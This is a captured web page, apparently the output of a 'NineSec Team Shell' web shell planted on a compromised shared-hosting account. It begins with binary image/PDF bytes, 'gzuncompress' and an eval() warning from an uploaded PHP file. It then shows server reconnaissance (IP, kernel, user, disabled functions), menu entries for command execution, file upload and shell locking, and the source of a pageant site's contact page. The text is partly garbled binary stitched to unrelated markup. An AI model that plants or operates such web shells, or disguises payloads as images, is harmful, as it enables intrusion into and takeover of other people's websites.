JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90 C  %PDF-1.3 % 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream x\mo7 a?Hyi{$E(i?ckrAvEzFHI|H?{|Z|X|Ň77?Oݞ__lOя77wx'?Ű8I] gQB2za]l|ɇ՟?} " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress
Warning: file_get_contents(test.txt): Failed to open stream: No such file or directory in /home/u178500310/domains/princess.uaeclick.com/public_html/uploads/1770357389_0_197006009.php(44) : eval()'d code on line 6
NineSec Team Shell
NineSec Team Shell
Server IP : 82.25.113.252  /  Your IP : 216.73.216.172
Web Server : LiteSpeed
System : Linux fr-int-web2058.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
User : u178500310 ( 178500310)
PHP Version : 8.2.29
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u178500310/domains/misschhattisgarh.com/public_html/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : /home/u178500310/domains/misschhattisgarh.com/public_html/contact.php
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Miss Chhattisgarh - Contact</title>
    <style>
         @import url('https://fonts.googleapis.com/css2?family=Playfair+Display:wght@400;500;600;700&family=Poppins:wght@300;400;500;600&display=swap');
        
        body {
            font-family: 'Poppins', sans-serif;
            scroll-behavior: smooth;
        }
        
        .playfair {
            font-family: 'Playfair Display', serif;
        }
        
        .hero-gradient {
            background: linear-gradient(135deg, rgba(0,0,0,0.7) 0%, rgba(0,0,0,0.3) 100%);
        }
        
        .gold-gradient {
            background: linear-gradient(135deg, #D4AF37 0%, #F4E5C2 100%);
        }
        
        .gold-text {
            background: linear-gradient(135deg, #D4AF37 0%, #F4E5C2 100%);
            -webkit-background-clip: text;
            background-clip: text;
            color: transparent;
        }
        
        .contestant-card:hover .contestant-overlay {
            opacity: 1;
        }
        
        .contestant-overlay {
            transition: all 0.3s ease;
        }
        
        .gallery-item {
            transition: all 0.3s ease;
        }
        
        .gallery-item:hover {
            transform: scale(1.03);
        }
        
        input:focus, textarea:focus {
            outline: none;
            box-shadow: 0 0 0 2px #D4AF37;
        }
        
        .nav-link {
            position: relative;
        }
        
        .nav-link:after {
            content: '';
            position: absolute;
            width: 0;
            height: 2px;
            bottom: -2px;
            left: 0;
            background: #D4AF37;
            transition: width 0.3s ease;
        }
        
        .nav-link:hover:after {
            width: 100%;
        }
        
        .active-nav:after {
            width: 100%;
        }
        
        .countdown-item {
            min-width: 80px;
        }
        
        @media (max-width: 768px) {
            .countdown-item {
                min-width: 60px;
            }
        }
    </style>
</head>
<body class="bg-gray-100 text-gray-800">
    <!-- Navigation -->
    <?php include './includes/header.php'; ?>

    <section id="contact" class="p-20 bg-gray-170 text-black">
        <div class="container mx-auto px-4">
            <div class="text-center mb-16">
                <h2 class="playfair text-3xl md:text-4xl font-bold mb-4">Get In <span class="gold-text">Touch</span></h2>
                <p class="text-gray-300 max-w-2xl mx-auto">Have questions or want to partner with us? We'd love to hear from you.</p>
                <div class="w-20 h-1 gold-gradient mx-auto mt-4"></div>
            </div>
            
            <div class="flex flex-wrap -mx-4">
                <div class="w-full lg:w-1/2 px-4 mb-8 lg:mb-0">
                    <div class="bg-gray-200 rounded-xl p-8 h-full">
                        <h3 class="playfair text-2xl font-bold mb-6 gold-text">Contact Information</h3>
                        
                        <div class="space-y-6">
                            <div class="flex">
                                <div class="flex-shrink-0">
                                    <div class="w-12 h-12 rounded-full bg-black bg-opacity-50 flex items-center justify-center">
                                        <i class="fas fa-map-marker-alt text-gold-500 text-xl"></i>
                                    </div>
                                </div>
                                <div class="ml-4">
                                    <h4 class="text-lg font-medium">Address</h4>
                                    <p class="text-gray-400">123 Fashion Street, Raipur, Chhattisgarh 492001</p>
                                </div>
                            </div>
                            
                            <div class="flex">
                                <div class="flex-shrink-0">
                                    <div class="w-12 h-12 rounded-full bg-black bg-opacity-50 flex items-center justify-center">
                                        <i class="fas fa-phone-alt text-gold-500 text-xl"></i>
                                    </div>
                                </div>
                                <div class="ml-4">
                                    <h4 class="text-lg font-medium">Phone</h4>
                                    <p class="text-gray-400">+91 9818043775</p>
                                </div>
                            </div>
                            
                            <div class="flex">
                                <div class="flex-shrink-0">
                                    <div class="w-12 h-12 rounded-full bg-black bg-opacity-50 flex items-center justify-center">
                                        <i class="fas fa-envelope text-gold-500 text-xl"></i>
                                    </div>
                                </div>
                                <div class="ml-4">
                                    <h4 class="text-lg font-medium">Email</h4>
                                    <p class="text-gray-400">info@misschhattisgarh.com</p>
                                    <p class="text-gray-400">sponsors@misschhattisgarh.com</p>
                                </div>
                            </div>
                        </div>
                        
                        <div class="mt-10">
                            <h4 class="text-lg font-medium mb-4">Follow Us</h4>
                            <div class="flex space-x-4">
                                <a href="#" class="w-10 h-10 rounded-full bg-black bg-opacity-50 flex items-center justify-center text-white hover:bg-gold-500 transition duration-300">
                                    <i class="fab fa-facebook-f"></i>
                                </a>
                                <a href="#" class="w-10 h-10 rounded-full bg-black bg-opacity-50 flex items-center justify-center text-white hover:bg-gold-500 transition duration-300">
                                    <i class="fab fa-instagram"></i>
                                </a>
                                <a href="#" class="w-10 h-10 rounded-full bg-black bg-opacity-50 flex items-center justify-center text-white hover:bg-gold-500 transition duration-300">
                                    <i class="fab fa-twitter"></i>
                                </a>
                                <a href="#" class="w-10 h-10 rounded-full bg-black bg-opacity-50 flex items-center justify-center text-white hover:bg-gold-500 transition duration-300">
                                    <i class="fab fa-youtube"></i>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
                
                <div class="w-full lg:w-1/2 px-4">
                    <div class="bg-gray-200 rounded-xl p-8 h-full">
                        <h3 class="playfair text-2xl font-bold mb-6 gold-text">Send Us a Message</h3>
                        
                        <form class="space-y-6">
                            <div>
                                <label for="contactName" class="block text-sm font-medium mb-1">Your Name *</label>
                                <input type="text" id="contactName" name="contactName" required 
                                       class="w-full px-4 py-2 bg-gray-190 border border-gray-600 rounded-lg focus:border-gold-500 focus:ring-gold-500 text-white">
                            </div>
                            
                            <div>
                                <label for="contactEmail" class="block text-sm font-medium mb-1">Email Address *</label>
                                <input type="email" id="contactEmail" name="contactEmail" required 
                                       class="w-full px-4 py-2 bg-gray-7\190 border border-gray-600 rounded-lg focus:border-gold-500 focus:ring-gold-500 text-white">
                            </div>
                            
                            <div>
                                <label for="contactSubject" class="block text-sm font-medium mb-1">Subject *</label>
                                <input type="text" id="contactSubject" name="contactSubject" required 
                                    class="w-full px-4 py-2 bg-gray-7\190 border border-gray-600 rounded-lg focus:border-gold-500 focus:ring-gold-500 text-white">
                            </div>
                            
                            <div>
                                <label for="contactMessage" class="block text-sm font-medium mb-1">Message *</label>
                                <textarea id="contactMessage" name="contactMessage" rows="5" required 
                                        class="w-full px-4 py-2 bg-gray-7\190 border border-gray-600 rounded-lg focus:border-gold-500 focus:ring-gold-500 text-white"></textarea>
                            </div>
                            
                            <div>
                                <button type="submit" class="w-full gold-gradient text-black font-bold py-3 px-4 rounded-lg hover:opacity-90 transition duration-300">
                                    Send Message
                                </button>
                            </div>
                        </form>
                    </div>
                </div>
            </div>
        </div>
    </section>

    <?php include './includes/footer.php'; ?>
</body>
</html>

NineSec Team - 2022